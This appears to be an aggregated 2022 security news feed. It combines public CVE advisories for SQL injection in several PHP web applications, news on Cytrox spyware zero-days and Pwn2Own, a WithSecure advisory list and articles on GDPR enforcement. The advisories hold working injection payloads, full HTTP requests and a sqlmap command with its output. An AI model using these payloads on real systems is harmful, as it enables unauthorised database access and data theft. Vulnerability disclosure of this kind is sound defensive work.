Badminton Center Management System 1.0 is vulnerable to SQL Injection via /bcms/classes/Master.php?f=delete_court_rental, id.

**badminton-center-management-system has SQL injection vulnerability **

vendors: https://www.sourcecodester.com/php/14887/merchandise-online-store-php-free-source-code.html

Date: 2022-05-06

Vulnerability File: /bcms/classes/Master.php?f=delete\_court\_rental

Vulnerability location: /bcms/classes/Master.php?f=delete\_court\_rental, id

\[+\] Payload: id=5' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

Tested on Windows 10, XAMPP

    POST /bcms/classes/Master.php?f=delete_court_rental HTTP/1.1
    Host: bcms.com
    Proxy-Connection: keep-alive
    Content-Length: 65
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://bcms.com
    Referer: http://bcms.com/bcms/admin/?page=court_rentals
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=4gth9auqof3f53e4gedjm3dct2
    
    id=5' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-30455: badminton-center-management-system/badminton-center-management-system.md at main · mikeccltt/badminton-center-management-system

A spyware vendor called Cytrox was found to be using several zero-day vulnerabilities in Google's Chrome browser and the Android kernel component. 
The post Zero-day vulnerabilities in Chrome and Android exploited by commercial spyware appeared first on Malwarebytes Labs.

The Google Threat Analysis Group (TAG) has revealed that of the nine zero-day vulnerabilities affecting Chrome, Android, Apple and Microsoft that it reported in 2021, five were in use by a single commercial surveillance company.

Did I hear someone say Pegasus? An educated guess, but wrong in this case. The name of the surveillance company—or better said, professional spyware vendor—is Cytrox and the name of its spyware is Predator.

**Google**

TAG routinely hunts for zero-day vulnerabilities exploited in-the-wild to fix the vulnerabilities in Google’s own products. If the group finds zero-days outside of its own products, it reports them to the vendors that own the vulnerable software.

Patches for the five vulnerabilities TAG mentions in its blog are available. Four of them affected the Chrome browser and one the Android kernel component.

**Vulnerabilities**

By definition, zero-day vulnerabilities are vulnerabilities for which no patch exists, and therefore potentially have a high rate of success for an attacker. That doesn’t mean that patched vulnerabilities are useless to attackers, but they will have a smaller number of potential targets. Depending on the product and how easy it is to apply patches, vulnerabilities can be useful for quite a while.

In the campaign uncovered by TAG, the spyware vendor used the zero-days in conjunction with other already-patched vulnerabilities. The developers took advantage of the time difference between the availability of patches for some of the critical bugs, as it can take a while before these patches are fully deployed across the Android ecosystem.

TAG says Cytrox abused four Chrome zero-days (CVE-2021-37973, CVE-2021-37976, CVE-2021-38000, and CVE-2021-38003) and a single Android zero-day (CVE-2021-1048) last year in at least three campaigns conducted on behalf of various governments.

**Cytrox**

TAG is actively tracking more than 30 vendors with varying levels of sophistication and public exposure selling exploits or surveillance capabilities to government-backed actors. Cytrox is one of these vendors, along with the NSO Group—undoubtedly the best known one among them and responsible for Pegasus spyware.

Citizenlab at the University of Toronto published information about Cytrox in December 2021. It says that Cytrox describes its own activities as providing governments with an “operational cyber solution” that includes gathering information from devices and cloud services. It also says it assists with “designing, managing, and implementing cyber intelligence gathering in the network, enabling businesses to gather intelligence from both end devices as well as from cloud services.”

Cytrox reportedly began life as a North Macedonian start-up and appears to have a corporate presence in Israel and Hungary. As such, Cytrox is believed to be part of the so-called Intellexa alliance, a marketing label for a range of mercenary surveillance vendors that emerged in 2019. The consortium of companies includes Nexa Technologies (formerly Amesys), WiSpear/Passitora Ltd., Cytrox, and Senpai, along with other unnamed entities, purportedly seeking to compete against other players in the cyber surveillance market such as NSO Group (Pegasus) and Verint.

**Government spyware**

Spyware packages such as Predator and Pegasus create problematic circumstances for the security teams at Google, Apple, and Microsoft, and it seems like they will not stop any time soon.

Whatever arguments these vendors use about how they are working for governments, and therefore not doing anything illegal, we all know the legitimacy of some governments lies in the eye of the beholder. And it is not always easy to find out who actually controls the data received from the spyware.

It is for good reason that the European Data Protection Supervisor (EDPS) has urged the EU to ban the development and deployment of spyware with the capabilities of Pegasus to protect fundamental rights and freedoms. The EDPS argues that the use of Pegasus might lead to an unprecedented level of intrusiveness, threatening the very essence of the right to privacy, since the spyware is capable of interfering with the most intimate aspects of our daily lives.

Zero-day vulnerabilities in Chrome and Android exploited by commercial spyware

A vulnerability classified as critical was found in Home Clean Services Management System 1.0. This vulnerability affects the file login.php. The manipulation of the argument email with the input admin%'/**/AND/**/(SELECT/**/5383/**/FROM/**/(SELECT(SLEEP(2)))JPeh)/**/AND/**/'frfq%'='frfq leads to sql injection. The attack can be initiated remotely but it requires authentication. Exploit details have been disclosed to the public.

Permalink

**Home Clean Services Management System login.php email SQL injection****Exploit Title: Home Clean Services Management System login.php email SQL injection****Exploit Author: webraybtl@webray.com.cn inc****Vendor Homepage: https://www.sourcecodester.com/php/15293/home-clean-service-free-source-code.html****Software Link: https://www.sourcecodester.com/download-code?nid=15293&title=Home+Clean+Service+System+in+PHP+Free+Source+Code****Version: Home Clean Services Management System 1.0****Tested on: Windows Server 2008 R2 Enterprise, Apache ,Mysql****Description**

The reason for the SQL injection vulnerability is that the website application does not verify the validity of the data submitted by the user to the server (type, length, business parameter validity, etc.), and does not effectively filter the data input by the user with special characters , so that the user's input is directly brought into the database for execution, which exceeds the expected result of the original design of the SQL statement, resulting in a SQL injection vulnerability.Home Clean Services Management System does not filter the content correctly at the "login.php" email module, resulting in the generation of SQL injection.

**Payload used:**

admin%'/**/AND/**/(SELECT/**/5383/**/FROM/**/(SELECT(SLEEP(2)))JPeh)/**/AND/**/'frfq%'='frfq

**Proof of Concept**

1.  Login the CMS. Admin Default Access: Email: admin Password: admin
    
2.  Open Page http://172.24.5.102/HCS/public\_html/
    
3.  Put sleep(2) payload (asdasd@mail.com'/**/AND/**/(SELECT/**/5383/**/FROM/**/(SELECT(SLEEP(2)))JPeh)/**/AND/**/'frfq%'='frfq) in the email content and click on Login to publish the page,Viewing the successfully sleep 2 seconds.  
    
4.  code
    

    Host: 172.24.5.102
    Pragma: no-cache
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    X-Proxyman-Repeated-ID: 235A6C1C
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3A9hTgZJbOpWAKqH
    Accept-Language: zh-CN,zh;q=0.9
    Accept-Encoding: gzip, deflate
    Cache-Control: max-age=0
    Origin: http://172.24.5.102
    Referer: http://172.24.5.102/HCS/public_html/index.php
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
    Upgrade-Insecure-Requests: 1
    Content-Length: 431
    Connection: close
    Cookie: PHPSESSID=fjbdak9heg1r2divhtlpubv986
    
    ------WebKitFormBoundary3A9hTgZJbOpWAKqH
    Content-Disposition: form-data; name="email"
    
    asdasd@mail.com'/**/AND/**/(SELECT/**/5383/**/FROM/**/(SELECT(SLEEP(2)))JPeh)/**/AND/**/'frfq%'='frfq
    ------WebKitFormBoundary3A9hTgZJbOpWAKqH
    Content-Disposition: form-data; name="password"
    
    1231312
    ------WebKitFormBoundary3A9hTgZJbOpWAKqH
    Content-Disposition: form-data; name="login"
    
    
    ------WebKitFormBoundary3A9hTgZJbOpWAKqH--

CVE-2022-1839: webray.com.cn/HCS_login_email_SQL_injection.md at main · Xor-Gerke/webray.com.cn

Inout Blockchain AltExchanger 1.2.1 allows index.php/home/about inoutio_language cookie SQL injection.

**Information**

    Vulnerability Name  : Multiple Remote SQL Injections in Inout Blockchain AltExchanger
    Product             : Inout Blockchain AltExchanger
    version             : 1.2.1
    Date                : 2022-05-21
    Vendor Site         : https://www.inoutscripts.com/products/inout-blockchain-altexchanger/
    Exploit Detail      : https://github.com/bigb0x/CVEs/Blockchain-AltExchanger-121-sqli.md
    CVE-Number          : In Progess
    Exploit Author      : Mohamed N. Ali @MohamedNab1l
    

  
**Description**

Three SQL injections have been discovered in Blockchain AltExchanger cryptocurrency exchange platform v1.2.1. This will allow remote non-authenticated attackers to inject SQL code. This could result in full information disclosure.  

**1- Vulnerable Parameter: symbol (GET)**

Vulnerability File: /application/third\_party/Chart/TradingView/chart\_content/master.php

  
**Sqlmap command:**

python sqlmap.py -u "http://vulnerable-host.com/application/third_party/Chart/TradingView/chart_content/master.php/history?from=1652650195&resolution=5&symbol=BTC-BCH" -p symbol --dbms=MySQL --banner --random-agent --current-db  

**output:**

\` Parameter: symbol (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: from=1652650195&resolution=5&symbol=BTC-BCH') AND 7820=7820 AND ('HqKC'='HqKC

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: from=1652650195&resolution=5&symbol=BTC-BCH') AND (SELECT 1060 FROM (SELECT(SLEEP(5)))WJpc) AND ('rQoO'='rQoO
    

\[16:43:22\] \[INFO\] testing MySQL \[16:43:23\] \[INFO\] confirming MySQL \[16:43:26\] \[INFO\] the back-end DBMS is MySQL \[16:43:26\] \[INFO\] fetching banner \[16:43:26\] \[INFO\] resumed: 5.6.50 web application technology: PHP 7.0.33 back-end DBMS: MySQL >= 5.0.0 banner: '5.6.50' \[16:43:26\] \[INFO\] fetching current database \[16:43:26\] \[INFO\] retrieved: inout\_blockchain\_altexchanger\_db current database: 'inout\_blockchain\_altexchanger\_db' \`  
  

**2- Vulnerable Parameter: marketcurrency (POST)**

Vulnerability File: /index.php/coins/update\_marketboxslider

  
**HTTP Request:**

**POST /index.php/coins/update_marketboxslider HTTP/1.1 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://vulnerable-host.com/ Cookie: inoutio_language=4 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,br Content-Length: 69 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36 Host: vulnerable-host.com Connection: Keep-alive displaylimit=4&marketcurrency=-INJEQT-SQL-HERE**  
**3- Vulnerable Parameter: Cookie: inoutio\_language (GET)**

Vulnerability File: /index.php

  
**HTTP Request:**

**GET /index.php/home/about HTTP/1.1 Referer: https://www.google.com/search?hl=en&q=testing User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36 x-requested-with: XMLHttpRequest Cookie: inoutio_language=0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,br Host: vulnerable-host.com Connection: Keep-alive**  
**Timeline**

    2022-05-03: Discovered the bug
    2022-05-03: Reported to vendor
    2022-05-21: Advisory published
    

  
**Discovered by**

    Mohamed N. Ali
    @MohamedNab1l
    ali.mohamed@gmail.com

CVE-2022-31489: CVEs/Blockchain-AltExchanger-121-sqli.md at main · bigb0x/CVEs

Tesla, Microsoft, and others targeted in hacking competition that saw Star Labs crowned ‘Masters of Pwn’

Tesla, Microsoft, and others targeted in hacking competition that saw Star Labs crowned ‘Masters of Pwn’

  

Pwn2Own Vancouver closed its doors on Friday (May 20), with more than $1 million being awarded to celebrate 15 years of the annual hacking event.

Held by Trend Micro’s Zero Day Initiative (ZDI), the contest saw hackers from across the world compete both in person and virtually to find bugs in products from a wide range of vendors, including Microsoft, Mozilla, and Apple’s Safari browser.

Participants were offered the opportunity to earn both money and points, which would go towards being crowned ‘Master of Pwn’.

A team from Star Labs in Singapore, who were taking part virtually, were crowned this year’s champions with a total of 27 points.

Read more of the latest hacking news

Overall, prize payouts amounting to $1.2 million were awarded for the 27 vulnerabilities that were discovered during the event, which was celebrating its 15th year.

Sponsors including Tesla and VMWare also provided targets for the competition, with David Berard and Vincent Dehors from Synacktiv discovering two unique bugs leading to a sandbox escape on the Telsa Model 3 Infotainment System.

“The Synacktiv team was able to remotely take over the infotainment system, and they showed how they could stand outside the car and turn on the wipers, open the trunk, and flash the lights,” Dustin Childs, senior communications manager at Trend Micro’s ZDI, told The Daily Swig.

He added: “The attempt that failed still demonstrated some interesting research, and we were pleased to acquire through a standard program submission.”

DON’T MISS Pwn2Own Miami: Hackers earn $400,000 by cracking ICS platforms

Other notable discoveries include the zero-click exploit of two bugs, injection and arbitrary file write, on Microsoft Teams found by Daniel Lim Wee Soong, Poh Jia Hao, Li Jiantao, and Ngo Wei Lin of Star Labs, which earned the team $150,000, and an improper configuration against Microsoft Teams found by Hector “p3rr0” Peralta, also worth $150,000.

Childs said: “We’ve had an exciting event with more than $1,000,000 awarded to the contestants. With so many attempts in the category, we expected several bug collisions, but that hasn’t been the case. Almost everything demonstrated was unique and qualified for the maximum payout.

“It was interesting the see the variety of Microsoft Teams exploits demonstrated. We had three successful entries, and they were all different.

“The most interested – and most dangerous – was a zero-click entry that could be used to take over an entire organization. That’s one of the reasons we have this contest – to see the latest in exploit techniques and help get the patched before they are exploited in the wild.

“It’s been great to see the evolution of the program over the years. We’ve gone from a small, browser-focused event to awarded more than $1,000,000 two years in a row. We celebrated or 15th anniversary this year and can’t wait to see where the contest grows from here.”

Read about all of the entries and subsequent payouts via a blog post from ZDI.

YOU MAY ALSO LIKE Cybersecurity conferences 2022: A rundown of online, in person, and ‘hybrid’ events

Pwn2Own Vancouver: 15th annual hacking event pays out $1.2m for high-impact security bugs

This week on Lock and Code, we speak with Whitney Merrill about why it is so difficult to get your own data from a company. 
The post Hunting down your data with Whitney Merrill: Lock and Code S03E11 appeared first on Malwarebytes Labs.

Depending on where you live, you can ask a company to hand over all the data it has collected about you and, in a matter of weeks as mandated by law, that company has to fork that information over.

Whether the company will abide on time, however, is a different story.

In the European Union, the United Kingdom, and California, consumers have a leg up in understanding what data is collected about them, largely thanks to several laws passed in those regions in the last few years. And at least in California, people can request that a company hand over the data it has collected about them, even if they are not an active user of that company’s product or a customer of that company’s services.

That’s because in today’s world, your data is not collected only by the companies you directly interact with, but also by the companies that your friends and families interact with.

In February of last year, Whitney Merrill proved this was true when she requested her data from the then-popular app Clubhouse. Though Merrill did not have an account with the company and was not a user of the app, she proved that Clubhouse did have her phone number, which had been shared with Clubhouse by Merrill’s contacts who were active users.

Merrill, who has requested her data from several more companies since then, learned more about data privacy compliance than about just what is being collected about her. Each request, Merrill said, can be different from another, and each request is done separately, forcing users who want to learn more about how their data is collected to spend increasingly more of their own time—time which they may not realistically have. The entire model right now, Merrill said, has many flaws.

> “We all interact with thousands and thousands of websites and providers that collect our data—maybe hundreds is probably a better number—in any given week or year. And, as a result, you have to go to each individual one and ask for access to your data… The burden is really on the end user.”
> 
> Whitney Merrill, Data Protection Officer and Privacy Counsel at Asana

This week on the Lock and Code podcast with host David Ruiz, we speak with Merrill about the difficulties of requesting your own data from a company and why some companies seem to interpret data privacy laws as mere suggestions. We also touch on proposed solutions to today’s problems with cross-border data transfers and what “data localization” may lead to in the future.

This video cannot be displayed because your _Functional Cookies_ are currently disabled.

To enable them, please visit our _privacy policy_ and search for the Cookies section. Select _“Click Here”_ to open the Privacy Preference Center and select _“Functional Cookies”_ in the menu. You can switch the tab back to _“Active”_ or disable by moving the tab to _“Inactive.”_ Click _“Save Settings.”_

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “God God” by Wowa (unminus.com)

Hunting down your data with Whitney Merrill: Lock and Code S03E11

Blockchain AltExchanger version 1.2.1 suffers from multiple remote SQL injection vulnerabilities.

# Information```Vulnerability Name : Multiple Remote SQL Injections in Inout Blockchain AltExchangerProduct : Inout Blockchain AltExchangerversion : 1.2.1Date : 2022-05-21Vendor Site : https://www.inoutscripts.com/products/inout-blockchain-altexchanger/Exploit Detail : https://github.com/bigb0x/CVEs/blob/main/Blockchain-AltExchanger-121-sqli.mdCVE-Number : In ProgessExploit Author : Mohamed N. Ali @MohamedNab1l``` # Description Three SQL injections have been discovered in Blockchain AltExchanger cryptocurrency exchange platform v1.2.1. This will allow remote non-authenticated attackers to inject SQL code. This could result in full information disclosure. ## 1- Vulnerable Parameter: symbol (GET) Vulnerability File: /application/third_party/Chart/TradingView/chart_content/master.php ### Sqlmap command:`python sqlmap.py -u "http://vulnerable-host.com/application/third_party/Chart/TradingView/chart_content/master.php/history?from=1652650195&resolution=5&symbol=BTC-BCH" -p symbol --dbms=MySQL --banner --random-agent --current-db` ### output:`Parameter: symbol (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: from=1652650195&resolution=5&symbol=BTC-BCH') AND 7820=7820 AND ('HqKC'='HqKC Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: from=1652650195&resolution=5&symbol=BTC-BCH') AND (SELECT 1060 FROM (SELECT(SLEEP(5)))WJpc) AND ('rQoO'='rQoO[16:43:22] [INFO] testing MySQL[16:43:23] [INFO] confirming MySQL[16:43:26] [INFO] the back-end DBMS is MySQL[16:43:26] [INFO] fetching banner[16:43:26] [INFO] resumed: 5.6.50web application technology: PHP 7.0.33back-end DBMS: MySQL >= 5.0.0banner: '5.6.50'[16:43:26] [INFO] fetching current database[16:43:26] [INFO] retrieved: inout_blockchain_altexchanger_dbcurrent database: 'inout_blockchain_altexchanger_db'` <img src="./resources/Blockchain-AltExchanger-121-sqli-1.png"> ## 2- Vulnerable Parameter: marketcurrency (POST) Vulnerability File: /index.php/coins/update_marketboxslider ### HTTP Request:----------------------------------------------------`POST /index.php/coins/update_marketboxslider HTTP/1.1Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://vulnerable-host.com/Cookie: inoutio_language=4Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflate,brContent-Length: 69User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36Host: vulnerable-host.comConnection: Keep-alivedisplaylimit=4&marketcurrency=-INJEQT-SQL-HERE`---------------------------------------------------- ## 3- Vulnerable Parameter: Cookie: inoutio_language (GET) Vulnerability File: /index.php ### HTTP Request:----------------------------------------------------`GET /index.php/home/about HTTP/1.1Referer: https://www.google.com/search?hl=en&q=testingUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36x-requested-with: XMLHttpRequestCookie: inoutio_language=0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflate,brHost: vulnerable-host.comConnection: Keep-alive`---------------------------------------------------- ## Timeline```2022-05-03: Discovered the bug2022-05-03: Reported to vendor2022-05-21: Advisory published``` ## Discovered by```Mohamed N. Ali@MohamedNab1lali.mohamed at gmail.com```

Blockchain AltExchanger 1.2.1 SQL Injection

Multiple Denial-of-Service vulnerabilities was discovered in the F-Secure Atlant and in certain WithSecure products while scanning fuzzed PE32-bit files cause memory corruption and heap buffer overflow which eventually can crash the scanning engine. The exploit can be triggered remotely by an attacker.

2022-05-23 CVE-2022-28874: Multiple Denial-of-Service (DoS) Vulnerabilities

Multiple denial-of-service (DoS) vulnerabilities while scanning fuzzed PE32-bit files can eventually crash the scanning engine. 

More 2022-04-25 CVE-2022-28871: Denial-of-Service (DoS) Vulnerability

A denial-of-service (DoS) vulnerability in WithSecure component may crash the scanning engine. 

More 2022-04-13 CVE-2022-22965: Vulnerability in Spring Framework Remote Code Execution affect WithSecure Products

A critical vulnerability in the Spring framework affects the following products: F-Secure Policy Manager, F-Secure Policy Manager for Linux, F-Secure Policy Manager Proxy, and F-Secure Elements Connector.

More 2022-03-07 CVE-2021-44750: Arbitrary Code Execution

WithSecure Support Tool (fsdiag) embedded within various WithSecure products for Microsoft Windows can be abused to execute arbitrary commands on the system.

More 2022-03-01 CVE-2021-44749: Universal Cross-Site Scripting Vulnerability in WithSecure SAFE Browser Protection for Android

Vulnerabilities in the browser protection of WithSecure SAFE for Android could allow remote attacker to steal user's sessions cookie.

More 2022-03-01 CVE-2021-44748: Universal Cross-Site Scripting Vulnerability in WithSecure SAFE Browser for Android

Vulnerabilities in the browser of WithSecure SAFE for Android could allow execution of JavaScript. 

More 2022-02-27 CVE-2021-44747: Denial-of-Service (DoS) Vulnerability

Crash while scanning fuzzed files can cause denial-of-service of the antivirus engine.

More 2022-02-07 CVE-2021-40837: Denial-of-Service (DoS) Vulnerability More 2021-12-20 CVE-2021-40836: Denial-of-Service (DoS) Vulnerability More 2021-12-14 CVE-2021-40835: URL Address Bar Spoofing in F-Secure SAFE Browser for iOS More 2021-12-08 CVE-2021-40834: User interface Spoofing in F-Secure SAFE browser for Android More 2021-11-24 CVE-2021-40833: Denial-of-Service (DoS) Vulnerability More 2021-10-06 CVE-2021-40832: Denial-of-Service (DoS) Vulnerability More 2021-10-06 CVE-2021-33603: Denial-of-Service (DoS) Vulnerability More 2021-10-04 CVE-2021-33602: Denial-of-Service (DoS) Vulnerability More 2021-09-26 CVE-2021-33601: Arbitrary Code Execution in Web Interface of F-Secure Internet Gatekeeper More 2021-09-26 CVE-2021-33600: Denial-of-Service Vulnerability in Web Interface of F-Secure Internet Gatekeeper More 2021-09-01 CVE-2021-33599: Denial-of-Service (DoS) Vulnerability More 2021-08-21 CVE-2021-33598: Denial-of-Service (DoS) Vulnerability More 2021-08-09 CVE-2021-33596: Fake Apple Login Prompt in F-Secure SAFE Browser for iOS More 2021-08-09 CVE-2021-33595: F-Secure SAFE Browser for iOS Vulnerable to Address Bar Spoofing More 2021-08-09 CVE-2021-33594: F-Secure SAFE Browser for Android Vulnerable to Address Bar Spoofing More 2021-08-07 CVE-2021-33597: Denial-of-Service (DoS) Vulnerability More 2021-06-01 CVE-2021-33572: Denial-of-Service (DoS) Vulnerability More 2021-01-25 FSC-2021-1: Reflected Cross-Site Scripting Vulnerability in F-Secure Cloud Protection for Salesforce More 2020-11-10 FSC-2020-3: Multiple Buffer Overflow Vulnerabilities in F-Secure Linux Security

Multiple buffer overflow vulnerabilities can lead local privilege escalation.

More 2020-05-17 FSC-2020-2: Local Non-Root User Can Rename or Delete System FIles in Linux Security

A local user can rename or delete arbitrary files owned by root in Linux Security.

More 2020-05-17 FSC-2020-1: CSRF Vulnerability in Web Interface of Linux Security

Vulnerability in web user interface of the F-Secure Linux Security can lead to remotely disable product settings.

More

CVE-2022-28874: Security advisories

The world-leading data law changed how companies work. But four years on, there’s a lag on cleaning up Big Tech.

One thousand four hundred and fifty-nine days have passed since data rights nonprofit NOYB fired off its first complaints under Europe’s flagship data regulation, GDPR. The complaints allege Google, WhatsApp, Facebook, and Instagram forced people into giving up their data without obtaining proper consent, says Romain Robert, a program director at the nonprofit. The complaints landed on May 25, 2018, the day GDPR came into force and bolstered the privacy rights of 740 million Europeans. Four years later, NOYB is still waiting for final decisions to be made. And it’s not the only one.

Since the General Data Protection Regulation went into effect, data regulators tasked with enforcing the law have struggled to act quickly on complaints against Big Tech firms and the murky online advertising industry, with scores of cases still outstanding. While GDPR has immeasurably improved the privacy rights of millions inside and outside of Europe, it hasn’t stamped out the worst problems: Data brokers are still stockpiling your information and selling it, and the online advertising industry remains littered with potential abuses.

Now, civil society groups have grown frustrated with GDPR’s limitations, while some countries’ regulators complain the system to handle international complaints is bloated and slows down enforcement. By comparison, the information economy moves at breakneck speed. “To say that GDPR is well enforced, I think it’s a mistake. It's not enforced as quickly as we thought,” Robert says. NOYB has just settled a legal case against the delays in its consent complaints. “There’s still what we call an enforcement gap and problems with cross-border enforcement and enforcement against the big players,” adds David Martin Ruiz, a senior legal officer at the European Consumer Organization, which filed a complaint about Google’s location tracking four years ago.

Lawmakers in Brussels first proposed reforming Europe’s data rules back in January 2012 and passed the final law in 2016, giving companies and organizations two years to fall in line. GDPR builds upon previous data regulations, super-charging your rights and altering how businesses must handle your personal data, information like your name or IP address. GDPR doesn’t ban the use of data in certain cases, such as police use of intrusive facial recognition; instead, seven principles sit at its heart and guide how your data can be handled, stored, and used. These principles apply equally to charities and governments, pharmaceutical companies and Big Tech firms.

Crucially, GDPR weaponized these principles and handed each European country’s data regulator the power to issue fines of up to 4 percent of a firm's global turnover and order companies to stop practices that violate GDPR's principles. (Ordering a company to stop processing people’s data is arguably more impactful than issuing fines.) It was never likely that GDPR fines and enforcement were going to flow quickly from regulators—in competition law, for instance, cases can take decades—but four years after GDPR started, the total number of major decisions against the world’s most powerful data companies remains agonizingly low.

Under the dense series of rules that make up GDPR, complaints against a company that operates in multiple EU countries are usually funneled to the country where its main European headquarters are based. This so-called one-stop-shop process dictates that the country leads the investigation. The tiny nation of Luxembourg handles complaints against Amazon; the Netherlands deals with Netflix; Sweden has Spotify; and Ireland is responsible for Meta’s Facebook, WhatsApp, and Instagram, plus all of Google’s services, Airbnb, Yahoo, Twitter, Microsoft, Apple, and LinkedIn.

A glut of early and complex GDPR complaints has led to backlogs at regulators, including the Irish body, and international cooperation has been slowed down by paperwork. Since May 2018, the Irish regulator has completed 65 percent of cases involving cross-border decisions—400 are outstanding, according to the regulator's own stats. Other cases, launched by NOYB against Netflix (Netherlands), Spotify (Sweden), and PimEyes (Poland) have all also dragged on for years.

Europe’s data regulators claim GDPR enforcement is still maturing and that it is working well and improving over time. (Officials from France, Ireland, Germany, Norway, Luxembourg, Italy, the UK, and Europe’s two independent bodies, the EDPS and EDPB, were all interviewed for this article.) The number of fines has ramped up as the legislation has aged, hitting a running total of €1.6 billion (around $1.7 billion). The biggest? Luxembourg fined Amazon €746 million ($790 million), and Ireland fined WhatsApp €225 million ($238.5 million) last year. (Both companies are appealing the decisions). At the same time, one lesser-known Belgian fine could change how the entire ad tech industry works. However, officials concede that changes to the way GDPR is enforced could speed up the process and ensure swifter action.

Helen Dixon is at the heart of Europe’s GDPR enforcement, with the Irish Data Protection Commission (DPC) responsible for an outsized number of Big Tech firms. The DPC has faced criticism for struggling to keep up with the number of complaints under its purview, drawing ire from fellow regulators and calls to reform the body. “If everything comes at you at the same time, clearly there’s going to be a lag in terms of prioritizing and dealing sequentially with the issues while standing up what is a very significant legal framework,” Dixon says, defending her office’s performance. Dixon says the DPC has had to handle GDPR’s complexity from scratch, leading to many cases and new processes, and there aren’t simple answers for many of them.

“I would classify the DPC as being very effective in the first four years of application of the GDPR,” Dixon says. “The fact that DPC has stood up a new legal framework that many described as 'the law of everything' in a couple of short years, and implemented what are very significant sanctions in the form of fines and corrective measures already in that time period” shows its success, Dixon says. The organization has enforced measures against Twitter, WhatsApp, Facebook, and Groupon, among thousands of national cases, during this time.

“There should be an independent review of how to reform and strengthen the DPC,” says Johnny Ryan, a senior fellow at the Irish Council for Civil Liberties. “We cannot know from outside what the problems are.” Ryan adds that blame can’t just be leveled at the Irish regulator. “The European Commission has immense power. The GDPR is supposed to be an immense project. And the Commission has neglected the GDPR,” he says. “It doesn't just propose the laws, it also has to see that they are applied.”

So far, the European Commission has backed enforcement of GDPR in Ireland and across the continent. “The Commission has consistently called on data protection authorities to continue stepping up their enforcement efforts,” Didier Reynders, the European Commissioner for Justice, says in a statement. “We have launched six infringement procedures under the GDPR.” These legal cases include action against Slovenia for failing to import GDPR into its national law and questioning the independence of the Belgian data authority.

However, following a complaint from Ryan in February, the EU Ombudsman, a watchdog for European institutions, opened an inquiry into how the Commission has been monitoring data protection in Ireland. (The Ombudsman says the Commission has until May 25 to reply, after asking for its initial deadline to be extended. Reynders says the Commission does not comment on ongoing inquiries). If the Commission does look into Ireland, it could make recommendations, says Estelle Massé, the global data protection lead at Access Now, a technology-focused civil rights organization. “There is an issue, and if you don't intervene in this way, I don’t really see how the situation will resolve,” Massé says. “It has to go through an infringement procedure.”

Despite clear enforcement problems, GDPR has had an incalculable effect on data practices broadly. EU countries have made decisions in thousands of local cases and issued guidance to organizations to say how they should use people’s data. Spain’s LaLiga soccer league was fined after its app spied on users, retailer H&M was fined in Germany after it saved details about employees’ personal lives, the Netherlands’ tax body was fined over its use of a ‘blacklist,’ and these are just a handful of the successful cases.

Some of GDPR’s impact is also hidden—the law isn’t just about fines and ordering companies to change—and it has improved company behaviors. “If you compare the awareness about cybersecurity, about data protection, about privacy, as it looked like 10 years ago and it looks today, these are completely different worlds,” says Wojciech Wiewiórowski, the European Data Protection Supervisor, who oversees GDPR cases against European institutions, such as Europol.

Companies have been put off using people’s data in dubious ways, experts say, when they wouldn’t have thought twice about it pre-GDPR. One recent study estimated that the number of Android apps on Google’s Play store has dropped by a third since the introduction of GDPR, citing better privacy protections. “More and more businesses have allocated significant budgets to doing data protection compliance,” says Hazel Grant, head of the privacy, security, and information group at London-headquartered law firm Fieldfisher. Grant says that when GDPR decisions are made—such as Austria’s decision to make the use of Google Analytics unlawful—companies are concerned about what it means for them. “Four or five years ago, that enforcement wouldn't have happened,” Grant says. “And if it had happened, maybe a few data protection lawyers would have known about it—it wouldn't have been out there with clients coming to us saying we need advice on this.”

